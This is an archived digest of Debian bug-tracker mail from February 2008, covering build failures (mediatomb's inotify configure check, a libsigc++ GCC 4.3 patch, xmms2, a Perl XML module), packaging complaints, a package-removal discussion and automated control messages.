Bug#465400: FTBFS: missing build-dependency on desktop-file-utils

2008-02-11 Thread William Grant
Package: geda-gattrib
Version: 1.4.0-1
Severity: serious
Justification: no longer builds from source

geda-gattrib's configure script wants to find update-desktop-database,
which is in desktop-file-utils. That is not build-depended upon, so the
build fails.

-- 
William Grant



signature.asc
Description: OpenPGP digital signature


Bug#456971: Bug#455623: FTBFS with GCC 4.3: missing #includes

2008-02-11 Thread Daniel Burrows
On Sun, Feb 10, 2008 at 06:33:46PM +0100, Martin Michlmayr <[EMAIL PROTECTED]> 
was heard to say:
> * Gaudenz Steinlin <[EMAIL PROTECTED]> [2008-02-09 21:01]:
> > I tried to fix this today, but quickly discovered that #456971 on
> > libsigc++-2.0-dev is blocking this further down the path. As I currently
> > don't have the time to fix libsigc++-2.0-dev as well I just subscribed
> > to #456971 and added a block. I will look into this again as soon as
> > #456971 is fixed.
> > 
> > What are the current NMU rules for this issue? Would an NMU for #456971
> > be acceptable atm?
> 
> I'm not sure there's a solution for #456971 yet, although I heard
> rumours the problem is fixed in a newer upstream release.
> 
> Daniel, did you have any chance to look into this issue?  This is
> getting really important because many packages fail to compile with
> gcc 4.3 because of this.

  I did talk to upstream, and it looks like there is a completely new
branch of libsigc++ in which this is fixed.  Unfortunately, it appears
that this change hasn't yet made it into the 2.0 branch.  If this is
becoming important, then the steps I see are to:

  (a) do my best to ensure that there are no nasty side-effects if I
  apply the workaround I found earlier, and
  (b) apply it if it looks safe.

  I might be able to make some time next weekend to at least get some
work started on (a), although that's probably something other people
could verify as well.  The patch that fixes the build is attached.
According to comments in the code, the typedef that's at fault is purely
a backwards-compatibility feature, and since it's just a typedef I would
*presume* that type erasure means it won't affect the ABI of the
library.  I'll feel better if I can verify that lots of code still
builds and runs against the new version (and that the new version is
runtime-compatible with the old version).

  Daniel
--- sigc++/signal.h.orig	2008-02-11 21:11:19.0 -0800
+++ sigc++/signal.h	2008-02-11 21:15:19.0 -0800
@@ -18,7 +18,11 @@
   //Compilers, such as older versions of SUN Forte C++, that do not allow this also often
   //do not allow a typedef to have the same name as a class in the typedef's definition.
   //For Sun Forte CC 5.7 (SUN Workshop 10), comment this out to fix the build.
-  #define SIGC_TYPEDEF_REDEFINE_ALLOWED 1
+  //
+  // Debian-specific patch: gcc-4.3 does not allow this either, and the
+  // comments below say this is a backwards-compatibility typedef, so
+  // just don't enable this feature at all.
+  //#define SIGC_TYPEDEF_REDEFINE_ALLOWED 1
 #endif
 
 namespace sigc {


Bug#465177: FTBFS: configure: error: unable to configure inotify support

2008-02-11 Thread Andres Mejia
On Monday 11 February 2008 7:59:40 pm Sergey Jin' Bostandzhyan wrote:
> Hi,
>
> On Mon, Feb 11, 2008 at 06:54:10PM -0500, Andres Mejia wrote:
> > > Well, if you are sure that the target machines *do have inotify
> > > support* the only thing that could help is the config.log output of the
> > > failed configure process.
> >
> > The best thing toward logs are located at
> > http://buildd.debian.org/pkg.cgi?pkg=mediatomb .
>
> That's the stdout of configure, what I am looking for is the config.log
> file that is created by configure during the process, but this is not there
> because everything is purged after the build. Any idea if we can get it?
>
> > > Then it should work; we do check the headers and then we run some small
> > > test code which is calling inotify_init(). If the inotify_init()
> > > function returns -1 (error) we will compile without inotify support;
> > > however - if the --enable-inotify parameter was specified configure
> > > will abort because it can not do what the user wanted.
> > >
> > > So the question: is inotify really working on those systems?
> >
> > I'm finding this behavior strange. Ubuntu accepted mediatomb into their
> > archive, yet now the powerpc architecture goes past the inotify check
> > just fine, but the i386 and amd64 architectures do not. Take a look at
> > https://launchpad.net/ubuntu/+source/mediatomb/0.10.0.dfsg1-1/
>
> This is indeed very strange, it must be somehow related to the setup of
> the particular machine. What I see is that the default inotify header is
> not working, then we are retrying with our own and then it is failing.
>
> However, without seeing the config.log file I can not say anything...
>
> > I know for the case of the i386, I've been able to successfully build
> > packages using pbuilder.
>
> Yes, I know, Leo has also been using pbuilder to create our custom .deb
> packages and we did not have any problems with inotify.
>
> Is the exact environment that those machines are using available somewhere?
> Can we reproduce the problem somehow?
>
> > Also, it looks like the Ubuntu buildd machines are giving a different
> > error, for architectures that run the inotify check sucessfully.
>
> Indeed, it seems that the build runs through but there is something wrong
> with the package, can't say much there either - I have no experience with
> .deb packages.
>
> Kind regards,
> Jin

I've investigated this some more and found that the inotify-tools package 
fails the test to see if sys/inotify.h actually works for the powerpc and 
ia64 architectures as well, yet the build continues for that package, unlike 
in mediatomb. Here's the difference between the two packages' configure.ac

*mediatomb's configure.ac*
dnl The check below was inspired by configure.ac from the inotify tools
dnl package, see the "Acknowledgements" section in our README file for more 
dnl information.
CXXFLAGS="$CXXFLAGS $INOTIFY_CXXFLAGS"
AC_MSG_CHECKING([whether sys/inotify.h works])
AC_RUN_IFELSE(
AC_LANG_PROGRAM([[#include ]],
 [[return (-1 == inotify_init());]]
   ),
[
AC_MSG_RESULT([yes]); 
AC_DEFINE([SYS_INOTIFY_H_OK],[1],[sys/inotify.h exists and 
works correctly])],
[
AC_MSG_RESULT([no, using own inotify headers])
AC_MSG_CHECKING([whether inotify-nosys.h works])
AC_RUN_IFELSE(
AC_LANG_PROGRAM([[#include "src/inotify-nosys.h"]],
 [[return (-1 == inotify_init());]]
),
[
AC_MSG_RESULT([yes]);
INOTIFY_OK=yes
],
[
AC_MSG_RESULT([no, disabling inotify support])
INOTIFY_OK=missing
])

])
fi

*inotify-tools configure.ac*
# Checks for header files.
AC_CHECK_HEADERS([sys/inotify.h mcheck.h])
AC_LANG(C)
AC_MSG_CHECKING([whether sys/inotify.h actually works])
AC_RUN_IFELSE(
  AC_LANG_PROGRAM([[#include ]],
  [[return (-1 == inotify_init());]]
  ),
  [AC_MSG_RESULT([yup]); AC_DEFINE([SYS_INOTIFY_H_EXISTS_AND_WORKS],[1],
[sys/inotify.h exists and works correctly])],
  [AC_MSG_RESULT([nope, using own inotify headers])]
)

Perhaps I'm wrong about what kernel each buildd machine is using. This would 
explain why this check fails on these architectures, but I can't find a 
straight answer. Sven, do you know the answer to this?

The buildd machines use sbuild, which uses debootstrap for creating the chroot 
environment, so I'm sure at least the latest version of linux-libc-dev is 
installed. In case some buildd machines don't support inotify, the check to 
see if inotify works should be left out.

-- 
Regards,
Andres



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a sub

Bug#465385: Missing debian/control file in package loop-aes-source

2008-02-11 Thread situert situert
Package: loop-aes-source
Version: 3.2b-4
Severity: grave
Justification: Makes the package unusable

Hi,

I am using Sid with the latest updates as of Feb 11th, 2008.
I tried to build loop-aes kernel modules. I installed
loop-aes-source and tried two methods:

1) using module assistant, and
2) using make-kpkg.

Both of them fail to build the kernel module because the file
debian/control is missing from the package.

The mentioned file exists in Etch version of the package.

Please rectify this problem. Thank you for your attention.

Regards,

situert



  

Never miss a thing.  Make Yahoo your home page. 
http://www.yahoo.com/r/hs



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#457503: gnumail.app: segfault on selecting preferences

2008-02-11 Thread Hubert Chathi
On Sat, 22 Dec 2007 23:03:27 +0100 Xavier Brochard
<[EMAIL PROTECTED]> wrote:

> Wanted to configure a freshly installed GNUMail, I clicked on
> preference and it crash. 

Hi Xavier,

I made a change to GNUMail, which may or may not fix this crash.  Can
you try out the GNUMail package from experimental, and see if it still
crashes when you click on preferences?

http://packages.debian.org/experimental/amd64/gnumail.app/download

Thanks

-- 
Hubert Chathi <[EMAIL PROTECTED]> -- Jabber: [EMAIL PROTECTED]
PGP/GnuPG key: 1024D/124B61FA http://www.uhoreg.ca/
Fingerprint: 96C5 012F 5F74 A5F7 1FF7  5291 AF29 C719 124B 61FA



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#464726: More info

2008-02-11 Thread Pierre THIERRY
/etc/mahara/servername.conf contains the following:

 8< 
# DO NOT EDIT THIS FILE!  It is managed by debconf!
# It will be overwritten the next time this package is configured.
# Use 'dpkg-reconfigure mahara-apache2' instead.
ServerName localhost
 8< 

Note that if I do `dpkg-reconfigure -plow mahara-apache2`, I'm only
asked one question about a redirection, and even if I let the answer
empty, the ServerName remains "localhost".

I'm no expert at apache configuration semantics, but it seemed to me
that having a 



section should change apache's configuration globally (thus srewing the
local admin's configuration).

That's why most other files in /etc/apache2/conf.d just define an Alias
(sometimes even commented) and change configuration with Directory
sections.

Doubtfully,
Pierre
-- 
[EMAIL PROTECTED]
OpenPGP 0xD9D50D8A


signature.asc
Description: Digital signature


Bug#465259: Oops---previous title change misleading

2008-02-11 Thread Max Hyre

   Dear Debian:

   I was a bit quick on the `send' button there---ktorrent 
is a red herring in this context.  What I'm after is a title 
which, when displayed in the Found/Fixed list, allows me to 
decide whether I'm willing to put up with the bug.  Looking 
through libqt3-mt's full bug list, it looks as if something like


Causes ``undefined symbol: lstat64'' error in other apps.

would be in order.


Best wishes,

Max Hyre




--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Processed: MOIN_ID cookie bug found in etch

2008-02-11 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> found 462984 1.5.3-1.2
Bug#462984: python-moinmoin: MOIN_ID cookie bug
Bug marked as found in version 1.5.3-1.2.

> thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#465363: gnash: Cross Browser action

2008-02-11 Thread J. Dietrich Boock
Package: gnash
Version: 0.8.1~rc.070818-2.1+b1
Severity: critical
Justification: breaks unrelated software


Please open

http://www.discus-fish24.de/

in firefox,

then open the same site in konqueror

if you klick in konqueror on one of the upper right buttons, the linked sites 
will be loaded in
firefox by adding tabs here and load the link in firefox.

this seem some kind of cross-browser bug. i dont no how to name this correctly. 
but 
i think in some circumstances critical.

thanks,

J. Dietrich Boock







-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (995, 'unstable')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.22-mppe (SMP w/2 CPU cores; PREEMPT)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages gnash depends on:
ii  gnash-common  0.8.1~rc.070818-2.1+b1 free Flash movie player - common f
ii  libc6 2.7-6  GNU C Library: Shared libraries
ii  libgcc1   1:4.3-20080202-1   GCC support library
ii  libglib2.0-0  2.14.5-2   The GLib library of C routines
ii  libgtk2.0-0   2.12.7-1   The GTK+ graphical user interface 
ii  libstdc++64.3-20080202-1 The GNU Standard C++ Library v3

gnash recommends no packages.

-- no debconf information



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#465177: Fwd: Re: Bug#465177: FTBFS: configure: error: unable to configure inotify support

2008-02-11 Thread Andres Mejia
Hello Sven,

I don't know if you were tracking this, but there's this bug where certain 
architectures are failing to build mediatomb.

Now as I understand it, the buildd machines builds packages in a chroot 
environment, with all packages found under unstable (the kernel, gcc, etc.). 
Isn't this correct?

Here I'm forwarding a mail to you from one of the developers of Mediatomb. Can 
you help with this?


--  Forwarded Message  --

Subject: Re: Bug#465177: FTBFS: configure: error: unable to configure inotify 
support
Date: Monday 11 February 2008
From: Sergey Jin' Bostandzhyan <[EMAIL PROTECTED]>
To: Andres Mejia <[EMAIL PROTECTED]>

Hi,

On Mon, Feb 11, 2008 at 06:54:10PM -0500, Andres Mejia wrote:
> > Well, if you are sure that the target machines *do have inotify support*
> > the only thing that could help is the config.log output of the failed
> > configure process.
> 
> The best thing toward logs are located at 
> http://buildd.debian.org/pkg.cgi?pkg=mediatomb .

That's the stdout of configure, what I am looking for is the config.log
file that is created by configure during the process, but this is not there
because everything is purged after the build. Any idea if we can get it?
 
> > Then it should work; we do check the headers and then we run some small
> > test code which is calling inotify_init(). If the inotify_init() function
> > returns -1 (error) we will compile without inotify support; however - if
> > the --enable-inotify parameter was specified configure will abort because
> > it can not do what the user wanted.
> >
> > So the question: is inotify really working on those systems?
> 
> I'm finding this behavior strange. Ubuntu accepted mediatomb into their 
> archive, yet now the powerpc architecture goes past the inotify check just 
> fine, but the i386 and amd64 architectures do not. Take a look at 
> https://launchpad.net/ubuntu/+source/mediatomb/0.10.0.dfsg1-1/

This is indeed very strange, it must be somehow related to the setup of
the particular machine. What I see is that the default inotify header is
not working, then we are retrying with our own and then it is failing.

However, without seeing the config.log file I can not say anything...

> I know for the case of the i386, I've been able to successfully build 
packages 
> using pbuilder.

Yes, I know, Leo has also been using pbuilder to create our custom .deb 
packages and we did not have any problems with inotify.

Is the exact environment that those machines are using available somewhere?
Can we reproduce the problem somehow?

> Also, it looks like the Ubuntu buildd machines are giving a different error, 
> for architectures that run the inotify check sucessfully.

Indeed, it seems that the build runs through but there is something wrong
with the package, can't say much there either - I have no experience with 
.deb packages.

Kind regards,
Jin


---

-- 
Regards,
Andres



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Processed: your mail

2008-02-11 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> tags 465177 help
Bug#465177: FTBFS: configure: error: unable to configure inotify support
There were no tags set.
Tags added: help

> thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Processed: Reopening and merging #462177

2008-02-11 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> reopen 462177
Bug#462177: sauce: should this package be removed?
Bug reopened, originator not changed.

> severity 462177 important
Bug#462177: sauce: should this package be removed?
Severity set to `important' from `serious'

> forcemerge 462177 465209
Bug#462177: sauce: should this package be removed?
Bug#465209: still useful today?
Forcibly Merged 462177 465209.

> thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#445016: sources

2008-02-11 Thread Nicolas Boullis
Hi,

On Sun, Feb 10, 2008 at 10:38:05PM +0100, Andrzej Zięba wrote:
> Package: athcool
> Version: 0.3.11-1.1
> 
> I have built the package from sources and I got executable that does not 
> need the libpci2. The problem is that the package does not build from 
> the sources without a problem. I had to add -lz to the LIBS variable in 
> the makefile to make it link properly.

Thanks, but I don't think this is the correct way to solve this problem.
Athcool does not by itself use (any symbol from) libz; only libpci does.
As long as libpci was available as a shared library, it was no problem, 
since shared libraries support dependencies. But for some reason, the 
pciutils maintainer has decided not to distribute this shared library 
anymore. The side effect is that the programs that want to use libpci 
now are supposed to "guess" what libraries libpci requires. I don't 
think this is correct.

Fortunately, pciutils' upstream provide a libpci.pc pkgconfig file that 
can be used to find the correct dependencies for libpci. But for some 
reason the maintainer for pciutils does not distribute this file.

Hence, I think the maintainer for pciutils should distribute this file 
in the pciutils-dev package (see bug #403181), and then I can use 
pkgconfig to generate the correct dependencies for athcool.


Cheers,

Nicolas




Bug#465259: Change title to ``libktorrent-2.2.5.so: undefined symbol: lstat64''?

2008-02-11 Thread Max Hyre

   Dear Debian:

  On my current ``apt-get dist-upgrade'', the bug check 
tells me


Retrieving bug reports... Done
Parsing Found/Fixed information... Done
serious bugs of libqt3-mt (3:3.3.7-9 -> 3:3.3.8b-1) 
#465259 - Same problem with ktorrent

Not having seen the ktorrent bug list, this is moderately 
unhelpful... :-)



Best wishes,

Max Hyre




--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#465177: FTBFS: configure: error: unable to configure inotify support

2008-02-11 Thread Sergey Jin' Bostandzhyan
Hi,

On Mon, Feb 11, 2008 at 06:54:10PM -0500, Andres Mejia wrote:
> > Well, if you are sure that the target machines *do have inotify support*
> > the only thing that could help is the config.log output of the failed
> > configure process.
> 
> The best thing toward logs are located at 
> http://buildd.debian.org/pkg.cgi?pkg=mediatomb .

That's the stdout of configure, what I am looking for is the config.log
file that is created by configure during the process, but this is not there
because everything is purged after the build. Any idea if we can get it?
 
> > Then it should work; we do check the headers and then we run some small
> > test code which is calling inotify_init(). If the inotify_init() function
> > returns -1 (error) we will compile without inotify support; however - if
> > the --enable-inotify parameter was specified configure will abort because
> > it can not do what the user wanted.
> >
> > So the question: is inotify really working on those systems?
> 
> I'm finding this behavior strange. Ubuntu accepted mediatomb into their 
> archive, yet now the powerpc architecture goes past the inotify check just 
> fine, but the i386 and amd64 architectures do not. Take a look at 
> https://launchpad.net/ubuntu/+source/mediatomb/0.10.0.dfsg1-1/

This is indeed very strange, it must be somehow related to the setup of
the particular machine. What I see is that the default inotify header is
not working, then we are retrying with our own and then it is failing.

However, without seeing the config.log file I can not say anything...

> I know for the case of the i386, I've been able to successfully build 
> packages 
> using pbuilder.

Yes, I know, Leo has also been using pbuilder to create our custom .deb 
packages and we did not have any problems with inotify.

Is the exact environment that those machines are using available somewhere?
Can we reproduce the problem somehow?

> Also, it looks like the Ubuntu buildd machines are giving a different error, 
> for architectures that run the inotify check sucessfully.

Indeed, it seems that the build runs through but there is something wrong
with the package, can't say much there either - I have no experience with 
.deb packages.

Kind regards,
Jin




-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#462178: please remove this package

2008-02-11 Thread Raphael Geissert
Dear Holger,

On 11/02/2008, Holger Levsen <[EMAIL PROTECTED]> wrote:
> Dear Raphael,
>
> > This package is being tracked by me
>
> I saw your mail to this bug, but I consider QA work team work :-)

Sure it is :)

>
> > and its removal will be requested after
> > giving a grace period of time (more than one week) so there are more
> > chances for people to adopt it.
> > I orphaned the package just a few days ago, so please wait a little bit
> > more.
>
> Why? Did you look at http://bugs.debian.org/230358 ? The package does not work
> at all with a 2.6 kernel. A 2.4 kernel was last shipped with sarge, so there
> is absolutly no point in keeping it any day longer in sid.

But if you re-read the bug report you will see that the necessary
changes to fix it aren't many (but I should probably reconsider that
because of /proc not existing in newer kernels, starting with .24?)

>
> > Normally package removals should not be requested before two months since
> > the package has been orphaned. In the case of this package I'll request its
> > removal within two weeks.
>
> As you wrote: "normally"...
>
> This package should not have been part of the etch release, so it's pointless
> to wait any day longer. Heck, you could even request its removal from
> stable :-)

I've already requested its removal from stable :)
I don't see any real problem on keeping this report a few more days on
wnpp to give people the opportunity to see it is up for adoption.

IMO some people prefer to fix an existing package than to 'Debianise'
from scratch, hence my desire to keep it a few more days.
But if you believe it really makes no sense at all to keep the report
open on wnpp feel free to reassign it to ftp.debian.org with a correct
removal request subject and CC me so I update packages-actions.txt

>
>
> regards,
> Holger
>
>

Kind regards,
-- 
Atomo64 - Raphael

Please avoid sending me Word, PowerPoint or Excel attachments.
See http://www.gnu.org/philosophy/no-word-attachments.html

Say NO to Microsoft Office broken standard.
See http://www.noooxml.org/petition



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#461194: marked as done (libxml-parser-lite-tree-perl: FTBFS: failed test t/01....junk 'foo bar="baz">woo' before XML element)

2008-02-11 Thread Debian Bug Tracking System

Your message dated Tue, 12 Feb 2008 00:17:06 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#461194: fixed in libxml-parser-lite-tree-perl 0.03-2
has caused the Debian Bug report #461194,
regarding libxml-parser-lite-tree-perl: FTBFS: failed test t/01junk 'foo 
bar="baz">woo' before XML element
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
461194: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=461194
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: libxml-parser-lite-tree-perl
version: 0.03-1
Severity: serious
User: [EMAIL PROTECTED]
Usertags: qa-ftbfs-20080116 qa-ftbfs
Justification: FTBFS on i386

Hi,

During a rebuild of all packages in sid, your package failed to build on i386.

Relevant part:

 > make[1]: Entering directory `/build/user/libxml-parser-lite-tree-perl-0.03'
 > PERL_DL_NONLAZY=1 /usr/bin/perl "-MExtUtils::Command::MM" "-e" 
 > "test_harness(0, 'blib/lib', 'blib/arch')" t/*.t
 > t/01junk 'foo bar="baz">woo' before XML element
 > # Looks like you planned 15 tests but only ran 2.
 > # Looks like your test died just after 2.
 > dubious
 >  Test returned status 255 (wstat 65280, 0xff00)
 > DIED. FAILED tests 3-15
 >  Failed 13/15 tests, 13.33% okay
 > Failed Test Stat Wstat Total Fail  Failed  List of Failed
 > ---
 > t/01.t   255 6528015   26 173.33%  3-15
 > Failed 1/1 test scripts, 0.00% okay. 13/15 subtests failed, 13.33% okay.
 > make[1]: *** [test_dynamic] Error 255
 > make[1]: Leaving directory `/build/user/libxml-parser-lite-tree-perl-0.03'
 > make: *** [debian/stamp-makefile-check] Error 2
 > dpkg-buildpackage: failure: debian/rules build gave error exit status 2

The full build log is available from:
http://people.debian.org/~lucas/logs/2008/01/16

A list of current common problems and possible solutions is available at 
http://wiki.debian.org/qa.debian.org/FTBFS . You're welcome to contribute!

About the archive rebuild: The rebuild was done on about 50 AMD64 nodes
of the Grid'5000 platform, using a clean chroot containing a sid i386
environment.  Internet was not accessible from the build systems.

-- 
| Lucas Nussbaum
| [EMAIL PROTECTED]   http://www.lucas-nussbaum.net/ |
| jabber: [EMAIL PROTECTED] GPG: 1024D/023B3F4F |


--- End Message ---
--- Begin Message ---
Source: libxml-parser-lite-tree-perl
Source-Version: 0.03-2

We believe that the bug you reported is fixed in the latest version of
libxml-parser-lite-tree-perl, which is due to be installed in the Debian FTP 
archive:

libxml-parser-lite-tree-perl_0.03-2.diff.gz
  to 
pool/main/libx/libxml-parser-lite-tree-perl/libxml-parser-lite-tree-perl_0.03-2.diff.gz
libxml-parser-lite-tree-perl_0.03-2.dsc
  to 
pool/main/libx/libxml-parser-lite-tree-perl/libxml-parser-lite-tree-perl_0.03-2.dsc
libxml-parser-lite-tree-perl_0.03-2_all.deb
  to 
pool/main/libx/libxml-parser-lite-tree-perl/libxml-parser-lite-tree-perl_0.03-2_all.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Martín Ferrari <[EMAIL PROTECTED]> (supplier of updated 
libxml-parser-lite-tree-perl package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Mon, 11 Feb 2008 08:39:30 -0200
Source: libxml-parser-lite-tree-perl
Binary: libxml-parser-lite-tree-perl
Architecture: source all
Version: 0.03-2
Distribution: unstable
Urgency: low
Maintainer: Debian Perl Group <[EMAIL PROTECTED]>
Changed-By: Martín Ferrari <[EMAIL PROTECTED]>
Description: 
 libxml-parser-lite-tree-perl - Lightweight XML tree builder
Closes: 450349 461194
Changes: 
 libxml-parser-lite-tree-perl (0.03-2) unstable; urgency=low
 .
   [ Damyan Ivanov ]
   * debian/control: Added: Vcs-Svn field (source stanza); Vcs-Browser
 field (source stanza); Homepage field (source stanza).
 .
   [ gregor herrmann ]
   * debian/rules: delete /usr/lib/perl5 only if it exists.
 .
   [ David Paleino ]
   * debian/control:
 - Standards-Version to 3.7.3
 - Maintainer field updated
 - Uploaders field added
 - Priority set to optional
   * debian/watch updated (Closes: #450349)
 .
  

Bug#461040: marked as done (xmms2: FTBFS: ERROR: == Runner == task failed! (return code 129 for #220))

2008-02-11 Thread Debian Bug Tracking System

Your message dated Mon, 11 Feb 2008 23:39:39 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#461040: fixed in xmms2 0.4DrKosmos-1
has caused the Debian Bug report #461040,
regarding xmms2: FTBFS: ERROR:  == Runner ==  task failed! (return code 129 for 
#220)
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
461040: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=461040
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: xmms2
version: 0.2DrJekyll-4
Severity: serious
User: [EMAIL PROTECTED]
Usertags: qa-ftbfs-20080115 qa-ftbfs
Justification: FTBFS on i386

Hi,

During a rebuild of all packages in sid, your package failed to build on i386.

Relevant part:

 > [  4/247] * xsubpp : 
 > /build/user/xmms2-0.2DrJekyll/src/clients/lib/perl/XMMSClientCollection.xs 
 > -> 
 > /build/user/xmms2-0.2DrJekyll/_build_/default/src/clients/lib/perl/XMMSClientCollection.c
 > /usr/bin/perl /usr/share/perl/5.8/ExtUtils/xsubpp -noprototypes -typemap 
 > /usr/share/perl/5.8/ExtUtils/typemap 
 > ../src/clients/lib/perl/XMMSClientCollection.xs > 
 > default/src/clients/lib/perl/XMMSClientCollection.c
 > [  5/247] * xsubpp : 
 > /build/user/xmms2-0.2DrJekyll/src/clients/lib/perl/XMMSClientResult.xs -> 
 > /build/user/xmms2-0.2DrJekyll/_build_/default/src/clients/lib/perl/XMMSClientResult.c
 > /usr/bin/perl /usr/share/perl/5.8/ExtUtils/xsubpp -noprototypes -typemap 
 > /usr/share/perl/5.8/ExtUtils/typemap 
 > ../src/clients/lib/perl/XMMSClientResult.xs > 
 > default/src/clients/lib/perl/XMMSClientResult.c
 > [  6/247] * xsubpp : 
 > /build/user/xmms2-0.2DrJekyll/src/clients/lib/perl/XMMSClientResultPropDict.xs
 >  -> 
 > /build/user/xmms2-0.2DrJekyll/_build_/default/src/clients/lib/perl/XMMSClientResultPropDict.c
 > /usr/bin/perl /usr/share/perl/5.8/ExtUtils/xsubpp -noprototypes -typemap 
 > /usr/share/perl/5.8/ExtUtils/typemap 
 > ../src/clients/lib/perl/XMMSClientResultPropDict.xs > 
 > default/src/clients/lib/perl/XMMSClientResultPropDict.c
 > [  7/247] * xsubpp : 
 > /build/user/xmms2-0.2DrJekyll/src/clients/lib/perl/XMMSClientResultPropDictTie.xs
 >  -> 
 > /build/user/xmms2-0.2DrJekyll/_build_/default/src/clients/lib/perl/XMMSClientResultPropDictTie.c
 > /usr/bin/perl /usr/share/perl/5.8/ExtUtils/xsubpp -noprototypes -typemap 
 > /usr/share/perl/5.8/ExtUtils/typemap 
 > ../src/clients/lib/perl/XMMSClientResultPropDictTie.xs > 
 > default/src/clients/lib/perl/XMMSClientResultPropDictTie.c
 > [  8/247] * pyrexc : 
 > /build/user/xmms2-0.2DrJekyll/src/clients/lib/python/xmmsapi.pyx -> 
 > /build/user/xmms2-0.2DrJekyll/_build_/default/src/clients/lib/python/xmmsapi.c
 > /usr/bin/pyrexc ../src/clients/lib/python/xmmsapi.pyx -o 
 > default/src/clients/lib/python/xmmsapi.c
 > ERROR:  == Runner ==  task failed! (return code 129 for #220)
 > ERROR:  == Task ==  -- task details begin --
 > action: pyrexc
 > idx:220
 > source: []
 > target: []
 > -- task details end --
 > Compilation failed 
 >  (error raised in module Scripting) 
 > make: *** [build-stamp] Error 1
 > dpkg-buildpackage: failure: debian/rules build gave error exit status 2

The full build log is available from:
http://people.debian.org/~lucas/logs/2008/01/15

A list of current common problems and possible solutions is available at 
http://wiki.debian.org/qa.debian.org/FTBFS . You're welcome to contribute!

About the archive rebuild: The rebuild was done on about 50 AMD64 nodes
of the Grid'5000 platform, using a clean chroot containing a sid i386
environment.  Internet was not accessible from the build systems.

-- 
| Lucas Nussbaum
| [EMAIL PROTECTED]   http://www.lucas-nussbaum.net/ |
| jabber: [EMAIL PROTECTED] GPG: 1024D/023B3F4F |


--- End Message ---
--- Begin Message ---
Source: xmms2
Source-Version: 0.4DrKosmos-1

We believe that the bug you reported is fixed in the latest version of
xmms2, which is due to be installed in the Debian FTP archive:

libaudio-xmmsclient-perl_0.4DrKosmos-1_i386.deb
  to pool/main/x/xmms2/libaudio-xmmsclient-perl_0.4DrKosmos-1_i386.deb
libxmmsclient++-dev_0.4DrKosmos-1_i386.deb
  to pool/main/x/xmms2/libxmmsclient++-dev_0.4DrKosmos-1_i386.deb
libxmmsclient++-glib-dev_0.4DrKosmos-1_i386.deb
  to pool/main/x/xmms2/libxmmsclient++-glib-dev_0.4DrKosmos-1_i386.deb
libxmmsclient++-glib1_0.4DrKosmos-1_i386.deb
  to pool/main/x/xmms2/libxmmsclient++-glib1_0.4DrKosmos-1_i386.deb
libxmmsclient++2_0.4DrKosmos-1_i386.deb
  to pool/main/x/xmms2/libxmmsclient++2_0.4DrKosmos-1_i386.deb
libxmmsclient-dev_0.4DrKosmos-1_i386.deb
  to pool/main/x/xmms2/libxmmsclient-dev_0.4DrKosmos-1_i386.deb
libxm

Bug#465285: marked as done (libmpich1.0gf -- package empty.)

2008-02-11 Thread Debian Bug Tracking System

Your message dated Tue, 12 Feb 2008 00:02:05 +
